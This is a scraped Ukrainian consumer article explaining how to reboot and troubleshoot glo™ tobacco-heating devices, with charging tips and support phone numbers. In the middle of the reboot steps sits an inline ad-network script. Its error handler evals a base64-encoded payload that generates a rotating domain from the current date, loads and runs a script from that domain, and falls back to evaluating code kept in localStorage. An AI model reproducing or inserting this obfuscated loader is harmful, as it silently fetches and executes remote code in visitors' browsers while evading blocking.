glo™ призначений для повнолітніх споживачів нікотиновмісної продукції.
Перш ніж ознайомитися зі статтею, рекомендуємо прочитати glo™ інструкцію, де ви, можливо, знайдете всі відповіді. Але якщо вам не зрозуміло чи потрібна додаткова допомога, тоді розберімо, як перезавантажити гло (glo™) правильно та що робити при інших проблемах, що виникли.
Завдяки перевантаженню пристроїв для нагрівання тютюну glo™ ви можете вирішити декілька проблемних питань — наприклад, якщо режим Boost не спрацював або девайс не вимикається. Також перезавантаження допоможе, якщо кнопки управління, що знаходяться на зовнішній панелі пристрою, перестали реагувати.
Функція перезавантаження доступна в усіх моделях glo™ (HYPER X2, HYPER PLUS, PRO, PRO SLIM, HYPER+ UNIQ).
Які дії треба виконати для правильного перезавантаження пристроїв glo™
Будь-який пристрій glo™ керується за допомогою єдиної кнопки управління (окрім моделі HYPER X2, що має нову кнопку для режиму Boost). Для перезавантаження потрібно натиснути кнопку управління та утримувати її впродовж 20 секунд. Після чого пристрій перезавантажиться і ви зможете відразу його використовувати. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Також є інші способи повернути пристрій в робочий режим, якщо перезавантаження не допомогло (пам’ятайте: будь-які дії з перезавантаження потрібно виконувати тільки згідно з інструкцією до вашого пристрою, щоб уникнути пошкоджень системи).
Якщо перезавантаження не допомогло, тоді краще віддати пристрій на діагностику. Зробити це можна у будь-якому фірмовому магазині glo™ studio або glo™ pop-up.
Попри високу якість продукції, будь-які гаджети можуть зламатися, якщо неправильно ними користуватися, ненароком розбити чи пошкодити, несвоєчасно чистити та неналежно доглядати. Саме тому даємо деякі рекомендації на такі випадки:
Якщо пристрій не вмикається. Перш за все потрібно перевірити чи девайс заряджений. Для перевірки достатньо натиснути на кнопку управління та подивитися на індикатори. Також пристрій для нагрівання тютюну може не вмикатися через переохолодження, у такому випадку потрібно почекатиу приміщенні доки він повернеться до нормальної температури та спробувати увімкнути його знову.Якщо пристрій не заряджається. Для зарядки можна використовувати ноутбук чи ПК, але рекомендується заряджати через мережу. Якщо використовувати USB Type-C кабель з комплекту, то час зарядки складає приблизно 2-3,5 години в залежності від моделі пристрою та адаптеру. Індикатор має заблимати та показувати, що відбувається зарядка.Усі індикатори світяться одночасно. Це свідчить про те, що пристрій не заряджається та не нагрівається, або у ньому розрядилася батарея. Для цього потрібно перевірити рівень заряду, натиснувши на кнопку, та поставити на зарядку у разі необхідності.
Якщо жодна з описаних вище порад не допомогла, потрібно звернутися на безкоштовну службу технічної підтримки бренду glo™ за допомогою у вирішенні даної проблеми за номерами 0 (800) 50-90-80 або 8008.*
* Дзвінки безкоштовні. Тільки для повнолітніх. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/yak-perezavantazhiti-glo-x2122/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook